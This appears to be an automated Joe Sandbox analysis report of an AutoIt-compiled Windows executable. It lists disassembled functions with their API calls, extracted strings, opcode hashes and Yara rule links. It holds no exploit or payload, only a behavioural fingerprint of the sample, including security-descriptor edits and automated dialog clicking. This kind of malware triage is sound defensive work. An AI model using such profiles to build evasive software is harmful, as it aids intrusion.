                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                                                                      • String ID: *.*
                                                                                                                      • API String ID: 3566783562-438819550
                                                                                                                      • Opcode ID: 3e1e78f6972e0b8c696963fe3a51fb8cb2e52cb4cbba002d5896e9ce3e9f7924
                                                                                                                      • Instruction ID: ce0bb26c8b2e770711bfe4e90c2a60f41d66129006eed59150544349f3d16f89
                                                                                                                      • Opcode Fuzzy Hash: 3e1e78f6972e0b8c696963fe3a51fb8cb2e52cb4cbba002d5896e9ce3e9f7924
                                                                                                                      • Instruction Fuzzy Hash: E9616E725047459FC711EF24C844AABB7E8FF89310F04891EF989D7252EB31E945CB92
                                                                                                                      Function 003EDAAD Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003A84A6: __swprintf.LIBCMT ref: 003A84E5
                                                                                                                        • Part of subcall function 003A84A6: __itow.LIBCMT ref: 003A8519
                                                                                                                      • CharLowerBuffW.USER32(?,?), ref: 003EDB26
                                                                                                                      • GetDriveTypeW.KERNEL32 ref: 003EDB73
                                                                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 003EDBBB
                                                                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 003EDBF2
                                                                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 003EDC20
                                                                                                                        • Part of subcall function 003A7E53: _memmove.LIBCMT ref: 003A7EB9
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                                                                                      • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                      • API String ID: 2698844021-4113822522
                                                                                                                      • Opcode ID: a6b3156653558b913b656c1a614ad76965b5fc37e499625f93ec7ed26ce4316d
                                                                                                                      • Instruction ID: 06ad263c7c42183022dd7864e7bb6298e8df8fb68e1c3a1b9f0ce09456b48175
                                                                                                                      • Opcode Fuzzy Hash: a6b3156653558b913b656c1a614ad76965b5fc37e499625f93ec7ed26ce4316d
                                                                                                                      • Instruction Fuzzy Hash: 14517B715043059FC701EF10C98196BB7E8EF89758F10896DF8969B2A2DB31EE09CB52
                                                                                                                      Function 003E3110 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 129windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00414085,00000016,0000138B,?,00000000,?,?,00000000,?), ref: 003E3145
                                                                                                                      • LoadStringW.USER32(00000000,?,00414085,00000016), ref: 003E314E
                                                                                                                        • Part of subcall function 003ACAEE: _memmove.LIBCMT ref: 003ACB2F
                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,00000000,?,00000FFF,?,?,00414085,00000016,0000138B,?,00000000,?,?,00000000,?,00000040), ref: 003E3170
                                                                                                                      • LoadStringW.USER32(00000000,?,00414085,00000016), ref: 003E3173
                                                                                                                      • __swprintf.LIBCMT ref: 003E31B3
                                                                                                                      • __swprintf.LIBCMT ref: 003E31C5
                                                                                                                      • _wprintf.LIBCMT ref: 003E326C
                                                                                                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 003E3283
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                                                                                      • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                      • API String ID: 984253442-2268648507
                                                                                                                      • Opcode ID: 0e07efc26a8ae4867c9209b3fb8ca9d132caf017b83c0991a92468a6735b77e5
                                                                                                                      • Instruction ID: 00ac2763fef8396f136b4bb6d6e8ccad9368f845231e370117fb3be3e1a3198b
                                                                                                                      • Opcode Fuzzy Hash: 0e07efc26a8ae4867c9209b3fb8ca9d132caf017b83c0991a92468a6735b77e5
                                                                                                                      • Instruction Fuzzy Hash: 14416172900218BACB16FBA1DD86EEFB778EF15741F200165F601B60A2DA656F04CA61
                                                                                                                      Function 003ED950 Relevance: 22.8, APIs: 10, Strings: 3, Instructions: 100fileCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 003ED96C
                                                                                                                      • __swprintf.LIBCMT ref: 003ED98E
                                                                                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 003ED9CB
                                                                                                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 003ED9F0
                                                                                                                      • _memset.LIBCMT ref: 003EDA0F
                                                                                                                      • _wcsncpy.LIBCMT ref: 003EDA4B
                                                                                                                      • DeviceIoControl.KERNEL32(00000000,000900A4,A0000003,?,00000000,00000000,?,00000000), ref: 003EDA80
                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 003EDA8B
                                                                                                                      • RemoveDirectoryW.KERNEL32(?), ref: 003EDA94
                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 003EDA9E
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                                                      • String ID: :$\$\??\%s
                                                                                                                      • API String ID: 2733774712-3457252023
                                                                                                                      • Opcode ID: d8a5905d491d8e89f2ebf2527aed316802467de5e26504b68b6840442effae43
                                                                                                                      • Instruction ID: 451e21f918c5a09902728badcc3641f7bc084d6da1fcf0fd074575ab44e5652b
                                                                                                                      • Opcode Fuzzy Hash: d8a5905d491d8e89f2ebf2527aed316802467de5e26504b68b6840442effae43
                                                                                                                      • Instruction Fuzzy Hash: E6310672A00258AADB21DFA4DC49FEE37BCAF84300F0082B5F509D20A1E770DB418BA1
                                                                                                                      Function 003F0B20 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __wsplitpath.LIBCMT ref: 003F0C93
                                                                                                                      • _wcscat.LIBCMT ref: 003F0CAB
                                                                                                                      • _wcscat.LIBCMT ref: 003F0CBD
                                                                                                                      • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 003F0CD2
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 003F0CE6
                                                                                                                      • GetFileAttributesW.KERNEL32(?), ref: 003F0CFE
                                                                                                                      • SetFileAttributesW.KERNEL32(?,00000000), ref: 003F0D18
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 003F0D2A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                                                                      • String ID: *.*
                                                                                                                      • API String ID: 34673085-438819550
                                                                                                                      • Opcode ID: 40dda74e69ed693afc8012dc97cff7ce1b85cd52448e95a35042c955298d78f2
                                                                                                                      • Instruction ID: aad101c3351e5805e32dc48e26337f40c8ff5b39ea9abca22f030aef682ef7da
                                                                                                                      • Opcode Fuzzy Hash: 40dda74e69ed693afc8012dc97cff7ce1b85cd52448e95a35042c955298d78f2
                                                                                                                      • Instruction Fuzzy Hash: 4E81C8715043099FC769DF68C844ABAB7E8BF89310F15892EFA85CB252E730DD45CB92
                                                                                                                      Function 003DB593 Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003DB8E7: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 003DB903
                                                                                                                        • Part of subcall function 003DB8E7: GetLastError.KERNEL32(?,003DB3CB,?,?,?), ref: 003DB90D
                                                                                                                        • Part of subcall function 003DB8E7: GetProcessHeap.KERNEL32(00000008,?,?,003DB3CB,?,?,?), ref: 003DB91C
                                                                                                                        • Part of subcall function 003DB8E7: RtlAllocateHeap.NTDLL(00000000,?,003DB3CB), ref: 003DB923
                                                                                                                        • Part of subcall function 003DB8E7: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 003DB93A
                                                                                                                        • Part of subcall function 003DB982: GetProcessHeap.KERNEL32(00000008,003DB3E1,00000000,00000000,?,003DB3E1,?), ref: 003DB98E
                                                                                                                        • Part of subcall function 003DB982: RtlAllocateHeap.NTDLL(00000000,?,003DB3E1), ref: 003DB995
                                                                                                                        • Part of subcall function 003DB982: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,003DB3E1,?), ref: 003DB9A6
                                                                                                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 003DB5F7
                                                                                                                      • _memset.LIBCMT ref: 003DB60C
                                                                                                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 003DB62B
                                                                                                                      • GetLengthSid.ADVAPI32(?), ref: 003DB63C
                                                                                                                      • GetAce.ADVAPI32(?,00000000,?), ref: 003DB679
                                                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 003DB695
                                                                                                                      • GetLengthSid.ADVAPI32(?), ref: 003DB6B2
                                                                                                                      • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 003DB6C1
                                                                                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 003DB6C8
                                                                                                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 003DB6E9
                                                                                                                      • CopySid.ADVAPI32(00000000), ref: 003DB6F0
                                                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 003DB721
                                                                                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 003DB747
                                                                                                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 003DB75B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2347767575-0
                                                                                                                      • Opcode ID: 78905caaa2093aabea80cf321227d2c7cd9811a1c3411276260e2f4d41e9b09c
                                                                                                                      • Instruction ID: 979a4819a38f5886b4076d0f34cec3afc7bb09a8400f6a87a201235981f4017b
                                                                                                                      • Opcode Fuzzy Hash: 78905caaa2093aabea80cf321227d2c7cd9811a1c3411276260e2f4d41e9b09c
                                                                                                                      • Instruction Fuzzy Hash: C4515D76A00209EFDF119FA4EC45EEEBB79FF44344F05816AF915AB2A0D7309A05CB64
                                                                                                                      Function 003FA268 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 159windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetDC.USER32(00000000), ref: 003FA2DD
                                                                                                                      • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 003FA2E9
                                                                                                                      • CreateCompatibleDC.GDI32(?), ref: 003FA2F5
                                                                                                                      • SelectObject.GDI32(00000000,?), ref: 003FA302
                                                                                                                      • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 003FA356
                                                                                                                      • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 003FA392
                                                                                                                      • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 003FA3B6
                                                                                                                      • SelectObject.GDI32(00000006,?), ref: 003FA3BE
                                                                                                                      • DeleteObject.GDI32(?), ref: 003FA3C7
                                                                                                                      • DeleteDC.GDI32(00000006), ref: 003FA3CE
                                                                                                                      • ReleaseDC.USER32(00000000,?), ref: 003FA3D9
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                      • String ID: (
                                                                                                                      • API String ID: 2598888154-3887548279
                                                                                                                      • Opcode ID: 586eff9b7ccf51f9072afbb400f4f6624f7d1061ac3ec8caa0ef1e3d88fee934
                                                                                                                      • Instruction ID: b6b3f95e839c7525d0461eaf7904921f230e931714f64c547f9b4e5fc711b75b
                                                                                                                      • Opcode Fuzzy Hash: 586eff9b7ccf51f9072afbb400f4f6624f7d1061ac3ec8caa0ef1e3d88fee934
                                                                                                                      • Instruction Fuzzy Hash: 0B514CB5A00709EFCB25CFA8CC85EAEBBB9EF48310F14842DF95997210C731A841CB54
                                                                                                                      Function 00403AF7 Relevance: 21.1, APIs: 1, Strings: 11, Instructions: 109COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00402AA6,?,?), ref: 00403B0E
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: BuffCharUpper
                                                                                                                      • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU$|EE
                                                                                                                      • API String ID: 3964851224-3503855182
                                                                                                                      • Opcode ID: 24a04cb4b8aa24aae2df5f805822962589f696f2120abdf9eaf1eb71b1f4283b
                                                                                                                      • Instruction ID: 9327ebb795a53b2a187de261466052cf2898cac8441fe20ef792673700bb1d76
                                                                                                                      • Opcode Fuzzy Hash: 24a04cb4b8aa24aae2df5f805822962589f696f2120abdf9eaf1eb71b1f4283b
                                                                                                                      • Instruction Fuzzy Hash: F041D2311002498FDF05EF04DC40BEB3729AF52359F145836ED51AF696EB389E4ACB19
                                                                                                                      Function 003E8097 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 72sleepwindowtimeCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • timeGetTime.WINMM ref: 003E809C
                                                                                                                        • Part of subcall function 003BE3A5: timeGetTime.WINMM(?,753DB400,00416163), ref: 003BE3A9
                                                                                                                      • Sleep.KERNEL32(0000000A), ref: 003E80C8
                                                                                                                      • EnumThreadWindows.USER32(?,Function_0004804C,00000000), ref: 003E80EC
                                                                                                                      • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 003E810E
                                                                                                                      • SetActiveWindow.USER32 ref: 003E812D
                                                                                                                      • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 003E813B
                                                                                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 003E815A
                                                                                                                      • Sleep.KERNEL32(000000FA), ref: 003E8165
                                                                                                                      • IsWindow.USER32 ref: 003E8171
                                                                                                                      • EndDialog.USER32(00000000), ref: 003E8182
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                      • String ID: @U=u$BUTTON
                                                                                                                      • API String ID: 1194449130-2582809321
                                                                                                                      • Opcode ID: d84e09ed44f41866ea75d3587089705fb31f04d226fcd287d6257bfbed833127
                                                                                                                      • Instruction ID: b08ece659ef72255d9643d5634216ca2ce9aed959be6ffecc1f4769c63bdac02
                                                                                                                      • Opcode Fuzzy Hash: d84e09ed44f41866ea75d3587089705fb31f04d226fcd287d6257bfbed833127
                                                                                                                      • Instruction Fuzzy Hash: 1221C670B00284BFE7335F22ED89A267B6AF71438AF440635F509922E1DFB64D46861A
                                                                                                                      Function 003E32B0 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 72windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00413C64,00000010,00000000,Bad directive syntax error,0043DBF0,00000000,?,00000000,?,>>>AUTOIT SCRIPT<<<), ref: 003E32D1
                                                                                                                      • LoadStringW.USER32(00000000,?,00413C64,00000010), ref: 003E32D8
                                                                                                                        • Part of subcall function 003ACAEE: _memmove.LIBCMT ref: 003ACB2F
                                                                                                                      • _wprintf.LIBCMT ref: 003E3309
                                                                                                                      • __swprintf.LIBCMT ref: 003E332B
                                                                                                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 003E3395
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                                                                                      • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:$"F
                                                                                                                      • API String ID: 1506413516-210779976
                                                                                                                      • Opcode ID: a4b594181eda2f2383ddb9f4b6e370e2af4ee7e855fa5f956c5df617bc0f69c2
                                                                                                                      • Instruction ID: b5af7f8805af7255e819647f644e64fb29b7ab69e2d3fd437e74185d653cbaf4
                                                                                                                      • Opcode Fuzzy Hash: a4b594181eda2f2383ddb9f4b6e370e2af4ee7e855fa5f956c5df617bc0f69c2
                                                                                                                      • Instruction Fuzzy Hash: CC214C32940219BBCF12AF90CC0AFEE7739FF18701F104456F915A50A2EB75AA68DB55
                                                                                                                      Function 003ED520 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 144COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • LoadStringW.USER32(00000066,?,00000FFF), ref: 003ED567
                                                                                                                        • Part of subcall function 003ACAEE: _memmove.LIBCMT ref: 003ACB2F
                                                                                                                      • LoadStringW.USER32(?,?,00000FFF,?), ref: 003ED589
                                                                                                                      • __swprintf.LIBCMT ref: 003ED5DC
                                                                                                                      • _wprintf.LIBCMT ref: 003ED68D
                                                                                                                      • _wprintf.LIBCMT ref: 003ED6AB
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
